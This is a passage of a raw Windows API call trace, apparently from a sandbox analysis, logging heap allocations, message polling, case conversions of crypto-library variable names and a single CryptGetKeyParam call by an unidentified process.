wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0189.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.026] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0189.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0189.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0189.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.027] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0189.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0189.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.028] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0189.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0189.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.029] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0189.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0189.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0189.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0189.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0189.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0189.030] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0189.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.031] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0189.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0189.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0189.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0189.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0189.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0189.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0189.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0189.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0189.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0189.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0189.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0189.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0189.036] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2788, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2788*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0189.036] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.036] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.036] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.036] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0189.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.036] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0189.037] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, 